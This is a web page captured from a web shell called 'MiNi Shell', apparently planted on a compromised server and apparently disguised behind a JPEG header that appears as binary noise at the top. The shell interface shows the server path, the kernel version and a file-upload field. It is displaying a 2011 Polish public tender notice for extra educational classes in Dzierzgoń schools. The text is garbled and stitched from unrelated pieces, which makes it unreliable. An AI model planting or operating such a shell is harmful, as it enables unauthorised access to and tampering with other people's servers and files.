JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/393042-N-2011.html

<p class="kh_header"><b>Dzierzgoń: Usługa edukacyjna na realizację projektu Coraz lepsi - Indywidualizacja procesu nauczania i wychowani uczniów klas I - III szkół podstawowych w gminie Dzierzgoń</b><br>
<b>Numer ogłoszenia: 393042 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Dzierzgonia , Plac Wolności 1, 82-440 Dzierzgoń, woj. pomorskie, tel. 055 2762501 w. 31, faks 055 2762257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzgon.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna na realizację projektu Coraz lepsi - Indywidualizacja procesu nauczania i wychowani uczniów klas I - III szkół podstawowych w gminie Dzierzgoń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zajęć dodatkowych w szkołach podstawowych na ternie gminy Dzierzgoń w ramach projektu Coraz lepsi - Indywidualizacja procesu nauczania i wychowania uczniów klas I-II szkół podstawowych w gminie Dzierzgoń, współfinansowany ze środków Europejskiego funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Prorytet IX - Rozwój wykształcenia w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych
Zakres, ilość i rodzaj zajęć w poszczególnych szkołach określają szczegółowe zadania stanowiące część zamówienia. Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy. 
Przedmiot zamówienia obejmuje następujące zadania:

Zadanie Nr 1 Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości  720 godzin lekcyjnych dla 12 grup ośmioosobowych dla uczniów klas I-III Szkoły Podstawowej im. Tysiąclecia Państwa Polskiego w Dzierzgoniu,   podzielone na następujące podzadania:
Podzadanie Nr 1.1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości  60 godzin lekcyjnych dla ośmioosobowej grupy A.

Podzadanie Nr 1.2. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy B.

Podzadanie Nr 1.3. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy C.

Podzadanie Nr 1.4. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy D.

Podzadanie Nr 1.5. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy E.

Podzadanie Nr 1.6. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy F.

Podzadanie Nr 1.7. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy G.

Podzadanie Nr 1.8. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy H.

Podzadanie Nr 1.9. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy I.

Podzadanie Nr 1.10. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy J.

Podzadanie Nr 1.11. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy K.

Podzadanie Nr 1.12. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy L.

Zadanie Nr 2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 720 godzin lekcyjnych dla 12 grup ośmioosobowych dla uczniów klas I-III Szkoły Podstawowej im. Tysiąclecia Państwa Polskiego w Dzierzgoniu, podzielonych na następujące podzadania:
Podzadanie Nr 2.1. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy A. 

Podzadanie Nr 2.2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy B. 

Podzadanie Nr 2.3. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy C. 

Podzadanie Nr 2.4. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy D

Podzadanie Nr 2.5. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy E. 

Podzadanie Nr 2.6. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy F. 

Podzadanie Nr 2.7. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy G

Podzadanie Nr 2.8. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy H. 

Podzadanie Nr 2.9. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy I. 

Podzadanie Nr 2.10. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy J

Podzadanie Nr 2.11. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy K. 

Podzadanie Nr 2.12. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy L. 

Zadanie Nr  3. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy - 180 godzin lekcyjnych dla 3 grup ośmioosobowych uczniów klas I-III Szkoły Podstawowej im. Tysiąclecia Państwa Polskiego w Dzierzgoniu, podzielonych na następujące grupy:
Podzadanie Nr 3.1. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy A. 

Podzadanie Nr 3.2. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy B.

Podzadanie Nr 3.3. Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy C.  


Zadanie Nr 4. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno - przyrodniczych w ilości 480 godzin lekcyjnych w 8 grupach sześcioosobowych dla uczniów klas I-III Szkoły Podstawowej im. Tysiąclecia Państwa Polskiego w Dzierzgoniu, podzielonych na następujące podzadania:
Podzadanie 4.1. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy A. 

Podzadanie 4.2. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy B. 

Podzadanie 4.3. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy C. 

Podzadanie 4.4. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy D. 

Podzadanie 4.5. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy E. 

Podzadanie 4.6. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy F. 

Podzadanie 4.7. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy G. 

Podzadanie 4.8. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych dla sześcioosobowej grupy H. 

Zadanie Nr 5 Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w ilości 180 godzin lekcyjnych dla 3 grup uczniów klas I- III Szkoły Podstawowej im. Świętego Wojciecha w Bągarcie, podzielonych na następujące podzadania:

Podzadanie 5.1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym  także zagrożonych ryzykiem dysleksji w ilości  60 godzin lekcyjnych dla trzyosobowej  grupy A. 

Podzadanie 5.2 Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym  także zagrożonych ryzykiem dysleksji w ilości  60 godzin lekcyjnych dla trzyosobowej grupy B.

Podzadanie 5.3. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym  także zagrożonych ryzykiem dysleksji w ilości 60 godzin lekcyjnych dla dwuosobowej grupy C. 

Zadanie Nr  6. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w ilości 120 godzin lekcyjnych w 2 grupach trzyosobowych uczniów klas I - III Szkoły Podstawowej im. Świętego Wojciecha w Bągarcie. podzielonych na następujące podzadania:

Podzadanie 6.1. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w ilości 60 godzin lekcyjnych w trzyosobowej grupie A. 

Podzadanie 6.2. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w ilości 60 godzin lekcyjnych w trzyosobowej grupie B. 




Zadanie Nr 7. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 120 godzin lekcyjnych w 2 grupach trzyosobowych dla uczniów klas I - III Szkoły Podstawowej im. Świętego Wojciecha w Bągarcie, podzielonych na następujące podzadanie: 

Podzadanie 7.1. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno-przyrodniczych w ilości 60 godzin lekcyjnych w trzyosobowej grupie A. 

Podzadanie 7.2. Zajęcia rozwijające zainteresowania uczniów z uwzględnieniem nauk matematyczno - przyrodniczych w ilości 60 godzin lekcyjnych w trzyosobowej grupie B.

Zadanie Nr 8. Zajęcia rozwijające zainteresowania uczniów uzdolnionych w dziedzinie języka angielskiego dla uczniów klas I - III w Szkole Podstawowej im. Świętego Wojciecha w Bągarcie w ilości  60 godzin lekcyjnych w jednej grupie czteroosobowej.

Zadanie Nr 9. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w ilości 120 godzin lekcyjnych w 2 grupach dla uczniów klas I - III Szkoły Podstawowej w Bruku podzielonych na następujące podzadania:

Podzadanie 9.1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w ilości 60 godzin lekcyjnych w siedmioosobowej grupie A.

Podzadanie 9.2. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w ilości 60 godzin lekcyjnych w ośmioosobowej grupie B. 

Zadanie Nr  10.  Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 120 godzin lekcyjnych w 2 grupach ośmioosobowych  dla uczniów klas I - III Szkoły Podstawowej w Bruku podzielonych na następujące podzadania:

Podzadanie Nr 10.1. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy A. 

Podzadanie 10.2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych   w ilości 60 godzin lekcyjnych dla ośmioosobowej grupy B. 

Zadanie Nr 11. Zajęcia rozwijające zainteresowania uczniów uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych dla uczniów klas I - III w Szkole Podstawowej w Bruku w ilości 35 godzin lekcyjnych w 1 grupie pięcioosobowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 48.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga uprawnień określonych w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby, które będą uczestniczyć w wykonywaniu zamówienia muszą posiadać minimum 1 rok doświadczenia w nauczaniu dzieci szkół podstawowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dzierzgon.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Plac Wolności 1, 82-440 Dzierzgoń pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 12:00, miejsce: Urząd Miejski, Plac Wolności 1, 82-440 Dzierzgoń pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Coraz lepsi - Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Dzierzgoniu współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX Rozwój wykształcenia w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com